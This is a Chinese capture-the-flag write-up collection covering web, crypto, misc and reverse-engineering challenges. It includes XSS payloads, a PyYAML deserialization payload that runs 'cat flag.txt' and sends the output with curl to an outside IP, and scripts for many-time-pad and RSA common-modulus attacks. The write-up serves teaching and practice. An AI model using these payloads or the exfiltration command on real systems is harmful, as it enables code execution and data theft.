WEB
Easy XSS
payload:?name=dazhutizi"<script>alert('XSS')</script>得到:flag{- .... . ..-. .. .-. ... - -..- ... ... ..-. .-.. .- --. }摩斯解密:flag{THEFIRSTXSSFLAG}
Maybe Difficult XSS
payload:?keyword=dazhutizi"><A HREF="javascript:alert()">flag</a>
flag{W0w_iS_D1fficu1t_XSS's_F1ag}
Easy php
此题要是输入一个符合要求的数字,那么在sleep()的时候需要等上2个月了。is_numeric函数能够处理正常的数字以及十六进制或0x开头的字符串。而(int)处理十六或0x开头的字符串时会返回0。
payload1:?TIME=6e6
payload2:?TIME=0x4f1a00
未来chrome
看到网页
很显然应该修改User-Agent
得到一串base64编码的字符
解码得flag{uauaua_hahaha}
F12
打开网页看到提示直接F12寻找头部
flag{hahahaha_headers}
变量覆盖
F12寻找提示
打开文件121212.txt
进行审计
URL 通过 get 的方式传参,传输的数据以数组的形式被封装在$_GET 中;extract()函数从数组中将变量导入到当前的符号表,该函数使用数组键名作为变量名,使用数组键值作为变量值;isset()函数判断是否存在变量$shiyan;trim()函数移除字符串两侧的空白字符或其他预定义字符 ,这里是移除字符串两侧的空格;file_get_contents()函数将整个文件读入一个字符串;假如$shiyan的值等于文件的内容($content)时,就打印出flag
解题方法
shiyan=&flag=
得到flag
简单验证
F12控制台查看js,看到alert的链接,打开得到flag图片
猪圈密码,解码得flag为flag{free_mason}
Who si he
F12控制台,看到疑似base64的注释
Base64转图片解码,根据题目who is he?得flag为flag{zeyehongzhi}
夏风的日记
得到密码为ADAIR321321.
登陆后得到flag为flag{bugku-shegong_xmq}
Python
题目网址内容:
一 背景知识
在勾陈安全实验室的网站1上看到一篇文章,文章中讲的Pickle反序列化,而题目中用的是pyyaml模块的反序列化。那么什么是序列化,什么是反序列化呢?
1.1 yaml
yaml和xml、json一样,都是标记类语言,每个支持yaml格式的语言都会有自己的实现来进行yaml格式的解析,其中python里的是pyyaml模块,即是一个yaml库。每个语言的yaml解析器或多或少都会针对这个语言实现一套特殊的对象化规则。
1.2 序列化
序列化是指将数据结构或对象转换成二进制(字节序列)的过程
在wp.yaml中写入以下代码:
1 | date:!!str 2018-10-26 |
然后在同一目录下运行如下代码:
1 | import yaml |
运行后,结果如下:
可见,yaml中的语句被序列化
1.3 反序列化
反序列化顾名思义是序列化的逆过程,将在序列化过程中生成的二进制串转换成数据结构或者对象的过程
二 出题思路
从文章2得到信息:
要实现代码执行,需要序列化和反序列化的内容中出现该编程语言中(Python)的对象(函数、类),因为的对象的反序列化,是在构建一个对象的实例(实例化的过程)。如果一个对象中有函数的定义,有可执行代码,那么实例化后再通过方法调用或者其他的途径才能使其中的代码到执行。普通数据类型的反序列化只是变量相关的初始化、赋值等操作,不会涉及到逻辑处理的代码块,所有不会有代码的执行!(普通数据类型 = 数据,对象= 函数代码+数据)。
并且其主要导致漏洞的函数是yaml.load()。所以从3的wp中得到思路,构造一个上传功能,当用户上传以yaml为后缀或者yml为后缀的文件时,代码中的yaml.load()函数对其进行反序列操作。
本题主要使用python2.7+flask1.0.2+PyYaml3.12搭建环境。
核心代码如下:
三 解题过程
不断的尝试多种文件,发现有些是合法文件,比如jpg、png、txt等。但在知道这道题是yaml反序列化之后,直接上传一个yaml文件,其中的payload是
1 | "hello": !!python/object/apply:os.system ["curl http://47.106.105.37/?`cat flag.txt`"] |
在反序列化的过程中执行命令,cat的内容无法直接回显到页面,通过curl,使flag回显到服务器中,其中所给出的ip地址可变,甚至可以回显到本地。在access_log日志信息中可看到flag。
四 复现文件
文件已放在招新群中~~
使用以下命令运行docker
1 | docker build -t ctf_web . #创建镜像,ctf_web是任意取的名字 |
Crypto
onetime pad :
Attacking A Many Time Pad - Cryptography
https://github.com/Jwomers/many-time-pad-attack
import string
import collections
import sets, sys
c1='220900155b09223d3a270a5813260d1a07111a0e3257137a5d'
c2='08080415083b3f3b3b69030d131f0c00005005027f535d575d'
c3='15090547342135742b20031113020417545400042d4b434714'
c4='084c1204132a3d31736927545b17040110111a0f3e46135a09'
c5='0f1f4113132a703b31251754561c06010d411a0e305c135e18'
c6='0e0305470f2731207f201d545e13111b115c0f133651525f11'
c7='461c13080d2a3e742b264e1656520b1c00110d153e51585619'
c8='031a04155b2636742b210b5458171c531d424e0c3a4247130e'
c9='05191302576f1c312b69231113190b1c031107017f4b5c465d'
c10='011e04025b3839203769031113060a5301420b472b5a5a405d'
# c11='080f131e0b3b393b31691d175b170816545002103e4b401d0c'
ciphers = [c1, c2, c3, c4, c5, c6, c7, c8, c9, c10]
# The target ciphertext we want to crack
#target_cipher = "0529242a631234122d2b36697f13272c207f2021283a6b0c7908"
# XORs two string
def strxor(a, b): # xor two strings (trims the longer input)
return "".join([chr(ord(x) ^ ord(y)) for (x, y) in zip(a, b)])
def target_fix(target_cipher):
# To store the final key
final_key = [None]*150
# To store the positions we know are broken
known_key_positions = set()
# For each ciphertext
for current_index, ciphertext in enumerate(ciphers):
counter = collections.Counter()
# for each other ciphertext
for index, ciphertext2 in enumerate(ciphers):
if current_index != index: # don't xor a ciphertext with itself
for indexOfChar, char in enumerate(strxor(ciphertext.decode('hex'),
ciphertext2.decode('hex'))): # Xor the two ciphertexts
# If a character in the xored result is a alphanumeric character,
it means there was probably a space character in one of the plaintexts (we don't know
which one)
if char in string.printable and char.isalpha():
counter[indexOfChar] += 1 # Increment the counter at this index
knownSpaceIndexes = []
# Loop through all positions where a space character was possible in the
current_index cipher
for ind, val in counter.items():
# If a space was found at least 7 times at this index out of the 9 possible
XORS, then the space character was likely from the current_index cipher!
if val >= 7: knownSpaceIndexes.append(ind)
#print knownSpaceIndexes # Shows all the positions where we now know the key!
# Now Xor the current_index with spaces, and at the knownSpaceIndexes positions
we get the key back!
xor_with_spaces = strxor(ciphertext.decode('hex'),' '*150)
for index in knownSpaceIndexes:
# Store the key's value at the correct position
final_key[index] = xor_with_spaces[index].encode('hex')
# Record that we known the key at this position
known_key_positions.add(index)
# Construct a hex key from the currently known key, adding in '00' hex chars where
we do not know (to make a complete hex string)
final_key_hex = ''.join([val if val is not None else '00' for val in final_key])
# Xor the currently known key with the target cipher
output = strxor(target_cipher.decode('hex'),final_key_hex.decode('hex'))
print "Fix this sentence:"
print ''.join([char if index in known_key_positions else '*' for index, char in
enumerate(output)])+"\n"
# WAIT.. MANUAL STEP HERE
# This output are printing a * if that character is not known yet
# fix the missing characters like this: "Let*M**k*ow if *o{*a" = "cure, Let Me know
if you a"
# if is too hard, change the target_cipher to another one and try again
# and we have our key to fix the entire text!
#sys.exit(0) #comment and continue if u got a good key
target_plaintext = "cure, Let Me know if you a"
print "Fixed:"
print target_plaintext+"\n"
key = strxor(target_cipher.decode('hex'),target_plaintext)
print "Decrypted msg:"
for cipher in ciphers:
print strxor(cipher.decode('hex'),key)
print "\nPrivate key recovered: "+key+"\n"
for i in ciphers:
target_fix(i)
Base全家桶
直接上脚本
import base64
s1=”4C4A575851324332474E324547574B594A563546514D4B4747464D564F4E4C474B4E56454D32435947464A484D56444E4D5134513D3D3D3D”
s1=base64.b16decode(s1)
s1=base64.b32decode(s1)
s1=base64.b64decode(s1)
print s1
多次Base64
import base64
a = open('base64.txt')
try:
b = a.read( )
finally:
a.close( )
while True:
try:
b=base64.b64decode(b)
except:
print b;
break;
flag{base64_base64_base64}
随机Base64
import base64
f = open("code.txt")
file = f.read()
n = ''
steps= []
while True:
try:
n = base64.b16decode(file)
steps.append(16)
file = n
continue
except:
pass
try:
n = base64.b32decode(file)
steps.append(32)
file = n
continue
except:
pass
try:
n = base64.b64decode(file)
steps.append(64)
file = n
continue
except:
pass
break
print steps
print n
此类脚本可收藏哦
Easy RSA
简单的共模攻击,用python脚本提取n和e。
郁离歌大佬的文章:https://blog.csdn.net/like98k/article/details/79352076
from gmpy2 import invert
def egcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)
def main():
n = 17362520124149736059291605717839814089431261833972408175766504894876091272021197374480215582589878198406028065354454242540322618614670160317701698407729515781811530180885334265851364490357884909336085410775168953942120359215038925025305363480538685487988827339463890539279008285241711326041868183805848503077373967082910932422798165242481154593794712639251157856102009630894845049984346776659339380886766804814959778048440996937820138560802077375885700500737699904011032451007341777160586467318264288370080315519305800247682611802774996999330812534723806925426052547128371180683265963525581842037399869323246530085399
c1 = 11757177168629974661319129065020939259607843855964612407515015619551332717303594939284265148421101106538576564879770344246694669035164564635188309876801896156214909946098869029964618647606449218025915092461416329529723153695631060387903820322776063152970417682658882514448192870115306139048632667164375339647480060498038060662339943872320998391726896418231367745182167642401094985859083528539732718585607300300744481583877075988159078923393794888199752412273065186387778708588318818871255432956112609603017152148063465689319082652284861285738454428311471661017770501362483439955249552527930663707069794266908382237863
c2 = 2364848878397323871885597084235162950454738150033561990125608234733186785294327511676322556989693319543787881108157790541032502889824032246849038028277601291878651138223131738210948288040172974610279550123399373111991951111719314902078119305973622147396199257818150347936553495169543808071509800280778646769553776723985138633331947024508645378935223338224527962766707863670722941767067705851822587652625805245801727869961524972624327839027498877534264770109063202217409037083612774983213841234965045214820133529399280883524064963136158251681946077429913578531311243649928666453318570284124743168193304356485791847813
e1 = 2333
e2 = 23333
s = egcd(e1, e2)
s1 = s[1]
s2 = s[2]
# 求模反元素
if s1<0:
s1 = - s1
c1 = invert(c1, n)
elif s2<0:
s2 = - s2
c2 = invert(c2, n)
m = pow(c1,s1,n)*pow(c2,s2,n) % n
print hex(m)[2:].replace('l','').decode('hex')
# print n2s(m)
if __name__ == '__main__':
main()
MISC
大鲨鱼
Start in the sky
emmmmm 没什么好说的,右键属性查看详细信息发现flag。
暴力破解
使用Zipper爆破,纯数字。得到压缩密码,里面就是flag。
pg8
密码给了谁
翻看数据包发现了user得到base64码
解密得到邮箱,从而得到flag
图种
图片另存到桌面,修改后缀名为zip,解压缩得flag.txt
flag{C16CD2BCE86CF5824E6C2128E6B636CA}
音乐里的秘密
音乐另存为本地,用au打开发现摩斯密码,解密
crc32
根据所给压缩包crc32爆破,使用工具crc32-master
寻找合适结果组合得压缩包密码ctf_covteam_com_66
解压得covteam.txt
二进制转字符
得到一张图的base64,转图片得到一张二维码
解码得flag{D41D8CD98F00B204E9800998ECF8427E}
Android
easy andriod
在手机上下载下来 随便 输入flag发现输入不能为空和错误的字样
秘密
看到Native函数getPass()
比较的String来自于这个函数,所以直接逆向.so文件。
IDA打开
这道题只值50分
Pwn
Reverse
RE的入门
直接拖进IDA中 直接F5
得到flag
宣讲会的RE
丢入ida中 找到关键的比较函数,比较的是输入和字符串”232+1”。
so easy re
解法一:
IDA进去之后会发现字符串{Hacking_for_fun}
后面的操作是将字符串中的i转换为1,r换为1。
所以最后的答案是{Hack1ng_fo1_fun}
解法二
OD载入之后找到关键跳转函数。下断点
然后执行并输入随意的字符串,长度符合即可。寄存器中可以看到flag。
Easy Reverse
解密脚本
byte_8049AE0 = "lk2j9Gh}AgfY4ds-a6QW1#k5ER_T[cvLbV7nOm3ZeX{CMt8SZo]U"
byte_8049B15 = [0x48,0x5D,0x8D,0x24,0x84,0x27,0x99,0x9F,0x54,0x18,0x1E,0x69,0x7E,0x33,0x15,0x72,0x8D,0x33,0x24,0x63,0x21,0x54,0x0C,0x78,0x78,0x78,0x78,0x78,0x1B,0x00,0x00]
flag = ''
for v3 in range(29):
flag += byte_8049AE0[(byte_8049B15[v3]/3 -2)]
print flag
简单的函数加密
首先PEid查壳
脱壳之后找到关键函数
写解密脚本
#include <stdio.h>
#include <string.h>
char cflag[20]={'1','f','l','R','{','_','_','a','}','_','3','m','a','2','g','3','e'};
void change(int a,int b);
char flag[18];
void change(int a,int b)
{
cflag[a]^=cflag[b];
cflag[b]^=cflag[a];
cflag[a]^=cflag[b];
}
int main()
{
change(10,15);
change(1,15);
change(2,12);
change(14,10);
change(16,8);
change(0,1);
change(6,5);
change(8,11);
change(3,10);
change(5,12);
change(1,5);
change(0,15);
printf("%s",cflag);
}
生活不易,多才多艺。
by Covteam—Sma11-Tim3